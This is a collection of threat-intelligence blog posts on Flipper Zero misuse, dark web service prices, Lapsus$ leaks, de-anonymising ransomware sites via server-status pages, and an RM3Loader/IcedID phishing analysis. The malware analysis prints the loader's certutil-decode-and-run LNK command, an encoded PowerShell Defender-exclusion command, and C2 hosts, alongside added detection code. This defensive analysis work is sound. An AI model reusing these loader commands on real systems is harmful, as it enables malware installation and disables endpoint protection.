Investigation, Opinion

Flipper Zero: An Introduction to Its Capabilities and Potential Risks

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

What is Flipper Zero?

Flipper Zero is a portable, multi-function device, similar in style to the Tamagotchis of the late-90s.  While presenting itself as a cute gaming device, complete with a dolphin mascot, under the covers it is a versatile device that allows the user to interact with access control systems.  It can read, copy, and emulate NFC and RFID tags, radio remotes, iButton, and digital access keys.

The device

Development of Flipper Zero began in August 2020 with a Kickstarter campaign to raise funds for research and development.  It was developed to build a sleek and versatile device to replace the more unwieldy options already available.  The result was a single-case device with multiple features and skills to assist prototyping, hardware research, and penetration testing.

One of the key aspects of Flipper Zero is its commitment to open-source development. Its hardware and firmware are openly available, allowing users to modify and enhance its functionalities according to their specific needs. The open-source nature of Flipper Zero fosters collaboration, knowledge sharing, and continuous improvement within the hacker and security research communities.

Inside Flipper Zero – image credit Flipper Zero

What can it do?

Sub-Ghz radio frequencies

Flipper Zero contains a 433MHz antenna which allows it to access Sub-1 GHz radio frequencies.  Its chipset gives it a range of ~50m for targeting wireless devices and access control systems, such as garage doors, boom barriers, IoT sensors, and remote keyless systems.

RFID (125 kHz)

A 125 kHz antenna allows Flipper Zero to read low-frequency proximity cards.  Older cards, with no authentication mechanisms, can be stored in memory for later emulation.

NFC

Flipper Zero pairs its RFID capability with a 13.56 MHz NFC module.  This provides a high-frequency (HF) alternative which allows the device to read, write and emulate tags.

Infrared

Flipper Zero’s infrared transmitter can control electronics, such as TVs, stereo systems, etc.  Common TV vendor command sequences are contained in a built-in library which is constantly updated and maintained by the Flipper community.  It also functions as a receiver, which can receive signals and store them for later use.

Hardware Hacking

Flipper Zero allows versatility for hardware exploration, firmware flashing, debugging and fuzzing.  The device can be utilised to run code or provide control to hardware connected via GPIO.  It can function as a regular USB to UART/SPI/I2C/etc adapter.

Bad USB

Flipper Zero can emulate USB slave devices, making it appear as a regular device when attached to a computer, similar to a USB Rubber Ducky.  It can be pre-programmed with payloads to execute upon connection or provide functionality for USB stack fuzzing.

iButton

Flipper Zero has a built-in 1-Wire connector with a unique design which allows it to read and probe iButton sockets.  This allows it to read keys, store IDs in memory, write IDs and even emulate keys themselves.

Bluetooth

Flipper Zero has a built-in, fully supported, Bluetooth Low Energy module, allowing it to act as a host and peripheral device.  A corresponding open-source library provided by the developers gives functionality support to community-made apps.

Open-Source Firmware

The key property of Flipper Zero is its open-source firmware.  By making this available to all, the developers have encouraged the modification and extension of the Flipper Zero code.  This gives users access to all of the functions and hardware used by Flipper Zero, allowing them to build bespoke tools, for example homemade dosimeters or carbon dioxide detectors.

What are the risks?

As with a vast majority of technical tools and devices of this type, the Flipper Zero is not inherently malicious or illegal.  Its abilities make it a useful tool for penetration testing, ethical hacking, and hardware development.  However, Amazon has taken the view that the device is a “card skimmer”, and the Brazilian government have been seizing shipments of devices due to its alleged use in criminal activity.

Such a tool is not new to the market.  Existing hardware, such as Arduino or Raspberry Pi, has often been utilised to develop hardware for nefarious purposes.  The initial hardware itself is by no means illegal, and the same can be said for Flipper Zero.  Instead, we have looked at the people using the device.

Using SOS Intelligence’s intelligence platform, we have researched and tracked discussions of Flipper Zero on the Dark Web and across online criminal forums.  Using “Flipper Zero” as a keyword, we used our Alerts system to identify and flag instances where Flipper Zero is mentioned online.

Our period of monitoring ran from the start of 2023 to June 2023.  In that time we generated 158 alerts on the keyword “Flipper Zero”.  We have been able to break these down into the following:

[Charts: Number vs Post Content; Number vs Language; Source Occurrence]

Our data shows that, while there has not been much in terms of published development within criminal forums or the dark web, there has been significant interest in what has been posted.  Exploit development has been particularly popular within the Russian-language forums.  The use of Portuguese in more recent Dark Web posts was noted, and this appears to coincide with the Brazilian Government banning the importation of Flipper Zero.

As the product becomes more widely available and used by the community, we expect to see a rise in the number of posts detailing exploit development as more people share their work with the community.

Cracked.io

Tesla Charging Door Mods

On 16 May 2023, we identified Cracked.io member AKA Fu33y creating the thread “OPEN TESLA CHARGING DOORS MOD WITH FLIPPER ZERO”.  

The result was a post containing Anonfiles links to two .sub files.  These contained configuration data required to utilise Flipper Zero’s sub-GHz antenna to open the charging doors on Tesla vehicles.

Probing further into AKA Fu33y’s activity, we identified a second post from 16 May 2023 titled “HACKER FIRMWARE FOR FLIPPER ZERO”.

Hacker Firmware

This post provided a link to a GitHub repository where over 250 contributors have customised and improved the Flipper Zero firmware, creating an “Unleashed” variant.  The creators of this variant are explicit that they do not condone any illegal activity using Flipper Zero and state that their software is for experimental purposes only.  This variant provides a massive expansion of Flipper Zero’s inbuilt capabilities, widening the scope for criminal use.

Hackforums

We were able to identify similar activity on Hackforums.  User AKA aleff shared their own GitHub repository (my-flipper-shits).

Bad USB Payloads

This repository focused on scripts to utilise the BadUSB function.  They range from simple pranks, such as rick-rolling, to more exploitative functions, including data exfiltration or malicious code execution.

User AKA Angela White provided instructions on utilising cheap components and open-source software to create a WiFi Dev Board.

Utilising this upgrade, together with the mentioned WiFi Marauder software, would turn the Flipper Zero into a device capable of sniffing or attacking WiFi networks.

Exploit.in

Flipper Zero is still relatively new to the market, and supply issues have meant that it has not progressed far into the community as yet.  However, as it does, more opportunities will be given to both benevolent and malicious developers to generate custom firmware and code for Flipper Zero.  Our alert system has identified user AKA Rain_4, a member of Exploit.in, discussing the BadUSB possibilities of Flipper Zero and providing basic code for creating a reverse shell for macOS devices.  This highlights how, with only a few lines of code, the Flipper Zero can be utilised to gain access to victim devices (this does of course require Flipper Zero to be connected to the victim device).


Key Takeaways

The device itself: To reiterate, Flipper Zero is not in and of itself a malicious device.  It can have multiple benevolent uses and has the potential to be a useful multitool for practical operators in the cyber security industry, such as ethical hackers and penetration testers.  However, our data is showing that as the product becomes more widespread and available to the public as a whole, malicious users are generating code, tools and firmware to turn Flipper Zero into something more malicious than maybe its creators intended.

Using SOS Intelligence: What was apparent from the research undertaken was how SOS Intelligence enabled us to do this in a straightforward and efficient manner. Historically, this kind of deep dive into the more nefarious uses would not have been possible.

Using keywords and phrases and looking into the forums and sites where this kind of thing is routinely discussed was both easy and enjoyable. We’ve worked hard improving the user experience and UI and the feedback from this continues to be incredibly positive.

“In today’s rapidly evolving digital and physical landscape, comprehending emerging threats like FlipperZero is of utmost importance. Robust intelligence coverage, including monitoring adversary communication, enables informed risk-based analysis to understand the implications of this new digital radiofrequency tool. Our publication of the article “Flipper Zero: An Introduction to Its Capabilities and Potential Risks” serves as a valuable guide for defence, equipping stakeholders with insights to navigate this threat through informed analysis and strategic decision-making while demonstrating the capability and ease of use of our platform.”

Amir Hadzipasic, CEO and Founder

If you’d like to learn more, then please click here to book a demo.

References

  1. https://habr.com/ru/companies/vk/articles/723996/
  2. https://www.bleepingcomputer.com/news/technology/flipper-zero-banned-by-amazon-for-being-a-card-skimming-device-/
  3. https://www.bleepingcomputer.com/news/security/brazil-seizing-flipper-zero-shipments-to-prevent-use-in-crime/
  4. https://github.com/meshchaninov/flipper-zero-mh-z19
Investigation, The Dark Web

Dark Web Services Current Average Prices

It started with a tweet.

The dark web has long been associated with illegal activities and the sale of illicit goods and services. Among the many services offered on the dark web, hacking services are particularly prevalent.

Daniel’s tweet

We had our PIR and got to writing an Intelligence Requirements sheet following the PESTLEP model and that allowed us to prioritise our Collection Plan.

Collection plan.

With this in place we were able to start our collection process and begin answering Daniel Card’s tweet.

The collection process consisted of using the SOS Intelligence platform to identify current active market places for the specific IR areas we had to answer to.

Our platform has the capability to scan the dark web very quickly, with the ability to rotate around all active Onion services within 24-48 hours. This gives us a clear view of current and active Onion services.

In addition, SOS Intelligence has a broad range of automatic closed and open forum collection, giving us a real-time view into purchases and sales.

We then gathered the relevant information and calculated averages per service, per marketplace.

The research

The research for this article looked at around 40 different current dark web marketplaces and clear web and dark web forums, where hacking services are commonly offered for sale. The average prices for the services mentioned were determined based on the information gathered from these sources.

According to our research, the average price for a stolen credit card on the dark web is around $243.15.

This may seem like a low price, but the value of a stolen credit card can vary depending on the country it was issued in and the remaining balance on the card. For example, a credit card from the United States may be worth more than one from a less economically developed country. To keep things as like for like as possible we took the average card limit for a USA bank.

Counterfeit money is also commonly available on the dark web, with the average price per $1,000 coming in at around $396.24.

This may seem like a high price, but it’s important to remember that producing high-quality counterfeit money can be a time-consuming and expensive process.

Botnets, which are networks of compromised computers used to launch distributed denial of service (DDoS) attacks, are also commonly available on the dark web.

The average price for a botnet or DDoS attack is around $382.41.

Another common service offered on the dark web is the sale of so-called residential proxies, which are more difficult to detect and block as they “proxy” a cyber criminal’s connection out through a residential ISP. These proxies are used to mask the true IP address of the user and are often used by hackers to avoid detection.

The average price for a residential proxy is around $645 per month.

Finally, initial access to a target network is often available for sale on closed forums and marketplaces. This can include login credentials or vulnerabilities in a network that can be exploited to gain access. Initial Access, or IA, is typically the first ‘open door’ into a victim’s network and can lead to ransomware.

Prices for this service ranged wildly from a few hundred dollars to tens of thousands, due to wide ranging victims and seller motivations, varying greatly depending on access offered, method of access and compromised company.

The average price for initial access to a network is around $7,700. 

In conclusion, the dark web is a hub for a wide range of hacking services, from stolen credit card information to initial access to target networks.

While the prices for these services may seem steep, it’s important to remember that, at least for some of the services offered, there is more demand than supply.

It is also important to note that there is no guarantee with any of the services provided, and the sellers or marketplaces themselves could be scams or scammers, although a majority do offer purchase through escrow.

Header photo by Jefferson Santos on Unsplash.

Investigation

Investigation into the RM3Loader lnk delivery with a Michael Page recruitment campaign theme

Authors: Manraj and Amir Hadzipasic

SOS Intelligence observed an unusual phishing campaign that appeared to be delivering a PDF. Although malware is not a focus for us, we couldn’t ignore the opportunity to investigate a new and interesting malware delivery mechanism.

Sample 1 Email Headers

spf=pass [email protected];
dkim=pass header.d=aruba.it header.s=a1;
dmarc=none
Received: from smtp202-pc.aruba.it (smtp202-pc.aruba.it [62.149.157.202])
by with ESMTP id 3jsqqq1e9h-1
for <>; Tue, 27 Sep 2022 15:28:52 +0100
Received: from [127.0.0.1] ([83.32.137.88])
Content-Type: text/html; charset=UTF-8
Subject: A New Career Opportunity
From: "Michael Page Recruitment" <[email protected]>
Date: Tue, 27 Sep 2022 07:28:51 -0700
Message-ID: <[email protected]>
To: 
X-Mailer: Apple Mail (2.2104)

Link: https://kakjumi[.]com/download/?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&t=[REDACTED]&id=[REDACTED]
Updated Date: 2022-09-08T07:00:00Z
Creation Date: 2020-07-09T07:00:00Z
Registrar Registration Expiration Date: 2023-07-09T07:00:00Z
Registrar: NameSilo, LLC

Redirects to:
https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&id= [REDACTED]
Updated Date: 2022-08-23T00:00:00Z
Creation Date: 2022-08-23T02:51:42Z
Registrar Registration Expiration Date: 2023-08-23T00:00:00Z
Registrar: ERANET INTERNATIONAL LIMITED

Sample 2 Email Headers

spf=pass [email protected];
dkim=pass header.d=encoreshop.com.br header.s=20211014;
dmarc=none
Received: from us2-ob2-1.mailhostbox.com (us2-ob2-1.mailhostbox.com [162.210.70.55])
by with ESMTPS id 3jsqqq1f8t-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <>; Tue, 27 Sep 2022 16:46:13 +0100
Received: from [127.0.0.1] (unknown [87.116.246.51]
From: "Michael Page Recruitment" <[email protected]>
Subject: Work with us
Date: Tue, 27 Sep 2022 08:46:10 -0700
Importance: normal
X-Priority: 3
Content-Type: text/html; charset="UTF-8"

Link:
https://tyte-hosting[.]com/download/?t=[REDACTED]&close=[REDACTED]&ynu=[REDACTED]&rht=[REDACTED]&pass = [REDACTED]&id=[REDACTED]
Updated Date: 2022-09-21T16:51:32Z
Creation Date: 2004-09-25T05:30:32Z
Registrar Registration Expiration Date: 2023-09-25T05:30:32Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Redirects to:
https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close =[REDACTED]&id=[REDACTED]

Phishing/Malware download page

The application appears to be more advanced than generic phishing kits. It features an initial CAPTCHA and a number of API callbacks. 

Downloaded Zip LNK content, self referencing 

%comspec% /c if exist %tmp%\temp1_job_offer.zip\job_description.pdf.lnk  (certutil.exe -decode %tmp%\temp1_job_offer.zip\job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta) else (certutil -decode job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta)

This ensures that the HTA file is produced regardless of how the LNK is executed, whether from within the zip archive via cmd.exe /c or after being dropped, with certutil decoding it in either case.

Certutil is used to decode the embedded BASE64 encoded HTA file.

It is then called for execution by the &start statement. 

The HTA file is nested and self-referencing: it contains the decoy PDF, what is assumed to be the IcedID DLL, and other elements.

The HTA code is self contained, encoded in base64 within the pdf.lnk, disguised as a certificate and is decoded and written as a .HTA when the certutil -decode command is run.

Hta file structure  

HTTP Callback

This function may just be for statistics/tracking purposes.  

Offset extraction, launching of decoy PDF  and dll

Offset extraction is performed using ADODB.Stream to read and write parts of the HTA document: the sample we saw loads sections of embedded content and saves them to the user profile Temp location by specifying file offsets. The section is selected by wrapping the file’s OpenAsTextStream() call inside a Mid() function and passing the start position and length of the string.

:x=mid(fil.openastextstream().read(fil.size), 7928,85890)

The dll is loaded via regsvr32 passing the /s (silent) flag. It has been observed that the dll will not execute with regsvr32 unless the /s flag is used.

The DLL is 342,323 KB! However, after offset 000837E0 the entirety of the DLL’s contents is 0x20 (space). I noted that this may be an anti-analysis technique, as most sandboxes will not accept a file over 60 MB and tools such as CFF Explorer will not effectively handle a DLL over 40 MB.

Calls to 91.240.118.155 HTTPS (michaelpageuk5ukln.com, prakebtpboylodod.com)

Prakebtpboylodod.com hosts http://prakebtpboylodod[.]com/s2.dll which appears to be fetched by the originally loaded dll.

The script also adds a Defender exclusion for “C:\” and then waits for 15 seconds:

set q=CreateObject("WScript.Shell"):q.Run "powershell -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA",0:q.Run "timeout.exe /t 30", 0, True

Encoded Powershell command:

Add-MpPreference -ExclusionPath "C:\";timeout 15

A further timeout.exe is run for 30 seconds. 

Timeout.exe being run in your environment should be suspicious. 

Execution Overview Diagram 

The PDF embedded in the HTA, although benign itself, being observed opening in msedge as a result of clicking the LNK within the zip archive or externally, is an indicator of infection.

Network based indicators 

Once the DLL is run, regsvr32.exe makes connections from different local ports to port 443 on the remote host. The local port numbers that connections come from increment sequentially when a connection cannot be established. Seeing regsvr32.exe make multiple outbound connections should be considered suspicious.

In addition to this, seeing timeout.exe making outbound connections to port 443 should also be considered suspicious.
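As an added example (not code from SOS Intelligence or the original post), the following Python triages constructed process and network events for the chain described above: certutil decoding into %tmp%, mshta launching the .hta, the -enc PowerShell that adds the Defender exclusion, regsvr32 /s loading a DLL from Temp, and regsvr32.exe or timeout.exe connecting to port 443. The event schema and sample values are assumptions constructed for this example; the encoded PowerShell string is the one quoted above.

```python
"""Triage of constructed endpoint telemetry for the RM3Loader/IcedID chain.
The event dictionaries below are an assumed schema for this example, not a
real product log format."""
import base64
import re

# PowerShell -EncodedCommand and its common abbreviations; the argument is
# base64 of the UTF-16LE command text.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# %tmp% / %temp% or the expanded per-user Temp path.
TEMP_RE = re.compile(r"(?i)%te?mp%|\\AppData\\Local\\Temp")
# Signed Windows binaries the write-up flags when they talk out on port 443.
LOLBINS_OUTBOUND = {"regsvr32.exe", "timeout.exe"}

# Encoded command recovered from the HTA (quoted in the write-up).
ENCODED_COMMAND = (
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4A"
    "UABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA"
)

# Constructed sample events modelled on the observed execution chain.
SAMPLE_EVENTS = [
    {"type": "process", "image": "certutil.exe",
     "cmdline": r"certutil.exe -decode %tmp%\temp1_job_offer.zip\job_description.pdf.lnk %tmp%\.hta"},
    {"type": "process", "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\Users\victim\AppData\Local\Temp\.hta"},
    {"type": "process", "image": "powershell.exe",
     "cmdline": "powershell -enc " + ENCODED_COMMAND},
    {"type": "process", "image": "timeout.exe", "cmdline": "timeout.exe /t 30"},
    {"type": "process", "image": "regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Users\victim\AppData\Local\Temp\x.dll"},
    # Failed connects from sequential local ports, then one that succeeds.
    {"type": "network", "image": "regsvr32.exe", "lport": 49701, "rport": 443, "ok": False},
    {"type": "network", "image": "regsvr32.exe", "lport": 49702, "rport": 443, "ok": False},
    {"type": "network", "image": "regsvr32.exe", "lport": 49703, "rport": 443, "ok": True},
    {"type": "network", "image": "timeout.exe", "lport": 49710, "rport": 443, "ok": True},
    {"type": "process", "image": "notepad.exe", "cmdline": r"notepad.exe C:\notes.txt"},
]


def decode_encoded_powershell(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # bad base64 or not valid UTF-16LE
        return None


def triage_process(ev):
    """Return the names of the loader indicators a single process event matches."""
    findings = []
    img, cmd = ev["image"].lower(), ev["cmdline"]
    low = cmd.lower().rstrip()
    if img == "certutil.exe" and "-decode" in low and low.endswith(".hta"):
        findings.append("certutil_decode_to_hta")
    if img == "mshta.exe" and low.endswith(".hta") and TEMP_RE.search(cmd):
        findings.append("mshta_hta_from_temp")
    if img == "regsvr32.exe" and "/s" in low.split() and low.endswith(".dll") and TEMP_RE.search(cmd):
        findings.append("regsvr32_silent_temp_dll")
    if img == "powershell.exe":
        plain = decode_encoded_powershell(cmd)
        if plain and "add-mppreference" in plain.lower() and "-exclusionpath" in plain.lower():
            findings.append("defender_exclusion_added")
    if img == "timeout.exe":
        findings.append("timeout_exe_spawned")
    return findings


def triage_network(events):
    """Flag outbound 443 from the listed binaries and the sequential retry pattern."""
    findings, by_image = set(), {}
    for ev in events:
        if ev["type"] != "network":
            continue
        img = ev["image"].lower()
        if img in LOLBINS_OUTBOUND and ev["rport"] == 443:
            findings.add(f"{img}:outbound_443")
        by_image.setdefault(img, []).append(ev)
    for img, evs in by_image.items():
        failed = sorted(e["lport"] for e in evs if not e["ok"])
        if len(failed) >= 2 and all(b - a == 1 for a, b in zip(failed, failed[1:])):
            findings.add(f"{img}:sequential_retry_ports")
    return sorted(findings)


def triage(events):
    """Run both triage passes over an event list and return all findings."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            findings.extend(triage_process(ev))
    findings.extend(triage_network(events))
    return findings


if __name__ == "__main__":
    print("Decoded:", decode_encoded_powershell("powershell -enc " + ENCODED_COMMAND))
    for f in triage(SAMPLE_EVENTS):
        print("Finding:", f)
```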

Host based indicators

Files created

C:\Users\%USERPROFILE%\AppData\Local\Temp\temp1_job_offer.zip

C:\Users\%USERPROFILE%\AppData\Local\Temp.hta

C:\Users\%USERPROFILE%\AppData\Local\Temp\job_description.pdf

C:\Users\%USERPROFILE%\AppData\Local\Temp\x.dll

This loader seems to prefer to store files within the Temp folder, locating it either via the user environment variable %tmp% or via GetSpecialFolder(2) (2 = Temp).

File hashes:

dll: e2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd
pdf: e2981bd67116d744e2af43b0fc864e255dd57b1b961110df12a3d98ec465e947
Second “dll”: a5a211ceeccbe61c374fec9286e0185674a2ba98bc82711cf61f57b586fd7f19
job_offer.zip: 3bcfe639a418ffca0e3e839dc19d394b7b4455ce24db3fbb5cc09a7169da4046

dll runtime IOCs

RM3Loader CnC Panel communication:
Higmon.cyou
Prises.cyou
45.8.147.179
45.67.229.39

Stark-Industries is an allegedly Russian owned and operated hosting company that has been observed being used by a number of campaigns.

[ref] https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-rce-flaw-to-install-backdoors/

[ref] https://twitter.com/JAMESWT_MHT/status/1558171595562254340

Task Item embedded in email sample:

We are unsure exactly how this feature applies, but it could be something specific to an Outlook client allowing for automatic creation of a Task.

The activity of using a zip file with a document inside (in our unique case a pdf.lnk) has previously been observed with the IcedID malware. Both cases use mshta.exe to execute an .hta file, which then results in a malicious DLL being written to disk.

The main difference is that the previously observed activity documented by VMware uses the .hta to download the DLL from a remote server, whereas we have observed a unique method of unpacking and executing the first-stage payload. The pdf.lnk contains the .hta file, base64 encoded and disguised as a certificate.

When this is decoded and written to disk, the .hta then references itself by offset to unpack the malicious DLL and decoy PDF. https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html

Another similar sample can be found here, with a number of other public submissions being attributed to IcedID. A commonality with these samples is that they convey themselves to be business related documents (invoice.zip, request.zip etc), however when unzipped seem to be .rtf documents, word documents with macros or .lnk files disguised as folder shortcuts (Documents.lnk).  https://any.run/malware-trends/icedid

Key takeaways

  • RM3Loader is using a self-referencing LNK file to execute commands that reference the LNK itself.
  • The payload is contained within the dropped zip file and decoded using certutil.
  • The LNK does the important job of decoding the embedded HTA file and executing it.
  • The HTA contains VBScript that references content embedded in the HTA file itself to deploy a decoy PDF document and load the IcedID DLL.
  • IcedID behaviour has not significantly changed.
Investigation

SOS Intelligence analysing Lapsus$ data and breaches

We’ve been tracking what Lapsus$ have been doing and we’ve been analysing the data from the latest breaches. As with most hacking collectives, SOS Intelligence has been aware of and tracking the activity of the LAPSUS$ group for some time.

The group has contributed to some high-profile, high-impact breaches in the last few months. They have been utilising what could be considered fairly “low tech” methods to gain a foothold on their targets. Using our multi-faceted intelligence collection pipelines we are able to keep track of the group’s activities and announcements.

This time, the data included a large amount of GitHub source code that appears to belong to Globant, a major company with over 16,000 employees and $1.2 billion in revenue for 2021. This includes a number of repositories that contain “very sensitive information” such as TLS certificate private keys and chains, Azure keys and API keys for 3rd-party services.

TechCrunch have written about this and we were quoted in their article:

SOS Intelligence, a U.K-based threat intelligence provider that analyzed the leaked data, told TechCrunch that “the leak is legitimate and very significant, as far as Globant and Globant impacted customers are concerned.”

Techcrunch, March 30th 2022

Lapsus$ were only just in the news days ago, with an Oxford teen accused of being a multi-millionaire cyber-criminal connected with the group. Joe Tidy has an excellent article on what happened and how the teen in question was “doxxed” over on the BBC.

ITPro also cover this with comment from ourselves:

“From the paths I have looked at so far it looks like legitimate source code for mobile apps,” said Amir Hadžipašić, CEO and founder of SOS Intelligence to IT Pro. “It looks like there are internal microsites and data for them too, CVs and other personal information.

“That’s not all, they have full private keys for certs in most of the directories,” he added. “That there would be enough for me to stand up a website and serve their SSL and it be valid.”

IT Pro, 30th March 2022

Last but not least, we spoke to Bleeping Computer who have also covered this:

“In terms of legitimacy, going just by volume alone it’s hard to fabricate that amount of data – however samples of the data have been cross referenced with live systems and other methods that show the leak is legitimate and very significant as far as Globant and Globant’s impacted customers are concerned”.

Bleeping Computer, March 30 2022

For any size organisation, we help you sleep easier by giving you real time alerts of key phrases, emails and domains that appear on the Dark Web. For a demo, click here and we look forward to helping you.

Photo by Clint Patterson on Unsplash.

Investigation, Ransomware

A Special Investigation exposing a ransomware group’s clear-web IP and their duplicate identities

Intro

Before we dive into this investigation it is worth spending a brief moment describing the Apache server-status page.

The Apache Server Status page is a diagnostics and metrics page provided by the mod_status module. When mod_status is enabled a metrics page is served via localhost on the /server-status path. 

This page is typically served via localhost only. It offers diagnostic information about the Apache service and client requests. It shows the full request URI and client IP information.

Serving this page in production, outside of localhost, would be considered an information disclosure vulnerability and could offer an attacker information about client requests, essentially anything disclosed in a POST request URI or GET request.

In the scope of Tor onion services, where a Tor service is published it will inherently expose all localhost services to the entirety of Tor. Therefore any services designed to be protected by the typically non-externally-routable local loopback interface become externally accessible.

Locating Onions with Server-Status Pages

We must first export a list of all onions we are aware of that have server-status pages. One of the tasks we perform when crawling an onion service is to identify interesting paths and services. We perform a check for common directories such as server-status along with many others.

This process is identical to a directory enumeration, except for being far more optimised to ensure crawler performance is prioritised.

Therefore, using our path API, we are able to query for all onions we’ve found that are operational and have server-status pages:

server path search for server-status pages API

We find that there are 1,370 results with server-status pages:

Search results JSON export

The next task is to compile a list of all known (relatively current) ransomware blogs. We do this by merging our own lists, those we’ve found via OSINT and other published ransomware group site lists.

Of those we find a total of 71 unique onion addresses; these include v2 and v3 onions.

Now we have a relatively straightforward task of cross-checking our server-status results against this list to see what ransomware group sites have server-status pages, if any.

We do this with a very simple bash script that uses the grep tool:

Checking our output we see that there are in total only 3 ransomware blogs/group sites:

Arvin Club, Haron & Midas

Checking the first, Arvin Club:

We see that the server status page presents a vhost of localhost, not much to go by!

We also note that the server is running Ubuntu and is located in the UTC time zone.

Haron Server-Status Page

Checking the Haron server-status page we see that again the vhost is localhost, the server is running Debian and the time zone is Moscow Standard Time (MSK).

Lastly, checking the Midas server status page:

Midas Server-Status Page

We see a VHOST that is not localhost; this time it shows as “Becquerel.selectel.ru”. The server is running Debian, with a time zone of Moscow Standard Time.

Becquerel.selectel.ru

The hostname exposed in the server-status page for the Midas blog shows that the web server running the Midas blog is being hosted by Selectel, a Russian cloud hosting company:


For at least a short period of time the clear web portion of the Midas blog was exposed to the internet allowing Google to crawl and index the server-status page. 

The Google cache entry is of an AWS IP in Germany, 3.70.39.23. According to the Google cache entry the server was exposed at least up to the 27th of September 2021, likely some time before that date, and possibly after the 2nd of October 2021.

How are we sure that this cache entry is the Midas blog web-server? 

It could well have been another server if Selectel reprovisions hostnames, but the evidence contained in the server-status client requests on the cached Becquerel page is unique to the files found on the current Midas blog.

Identical files requested in the Google Cache as what exists on the Midas blog web server

We can say with strong certainty that the cache entry, the clear-web IP and hostname all belong to the Midas web server and that the host is current and operational. 

Linking Midas to Haron and Avaddon

Reviewing the client requests on refresh revealed some interesting paths. These paths point to image and file locations. Further investigation of these paths uncovered content that is shared by or identical on both the Haron and Midas blogs.

For example…

Haron test.jpg image

Midas test.jpg image

Artist: https://twitter.com/JarekMadyda

Midas Victim file [redacted]

Identical victim file on the Haron web server

Midas Mess directory

Mess directory

Identical but older Mess directory on the Haron web server

Haron mess directory

There is significant cross referencing between folder structures and files to show that the Midas web blog is a copy of the Haron web blog, if we go by the last modified date stamps on all of the files we have been able to observe across both blog sites. 

Not only does the sharing of files and file structure suggest that this is the same group/operator, but both web sites have each other’s logos.

Further, we can see logo “development” taking place, with logo names such as “newlogo2.png” and “finalLogo.png”. We propose it would be very unusual for one seemingly competing group to have another group’s logo on their web server, and indeed for them to have each other’s!

The curious case of Avaddon

On the topic of logos, investigation showed that both Haron and Midas contained the logo file for the Avaddon ransomware group:

There were rumours that not only Haron / Midas were the same group but that there were links with Haron to Avaddon.

Forum post on the Dublikat (Duplicate) dark web forum:

“Haron is built on code copied from other ransomware. So, the researchers noticed the following “parallels”: to create binaries, Haron uses the old ransomware builder Thanos; The ransomware site, where victims are asked to negotiate and pay the ransom, is almost identical to Avaddon’s site (as is the site for leaking stolen data); the ransom letter contains large snippets of text copied from a similar Avaddon note; Haron’s server contains icons and images previously found on the official Avaddon website. What all these similarities are connected with is still unclear. The researchers believe that the Haron operators may have hired one of the former Avaddon members, but they clearly did not have access to the source code of the Avaddon ransomware.”

Translated.

We are now able to shed a bit more light on this forum post. It would seem that not only did Haron share resources, images, text and icons, but so does Midas now too, since it is just a copy of the Haron blog.

Although Avaddon is now defunct and their onion address is no longer valid, we’ve been able to extract an HTML cache of their page from our index.

By making minor changes to the HTML code to reference the Midas and Haron onion addresses, we’ve effectively been able to “resurrect” the old Avaddon website.

Minor html updates to the Avaddon historic html source:

These minor updates allowed us to load the html source and have the page render in an almost exact way it would have done in the past.

Avaddon website resurrected loaded locally from a file:

And this is because the file and folder structure of the Haron / Midas websites still contain the original logo CSS and other content that were made for the Avaddon ransomware group website.

We are therefore able to put forward the claim supported by the evidence in this article that all previous suggestions that these groups were interlinked do appear to be correct.

We’ve confirmed the following Clear Web IPs for both Haron and Midas, both hosted by Selectel Russia:

45.146.164.58 – Midas

45.93.201.176 – Haron

This proves our assumption that the blogs are hosted on separate VMs both hosted at Selectel.
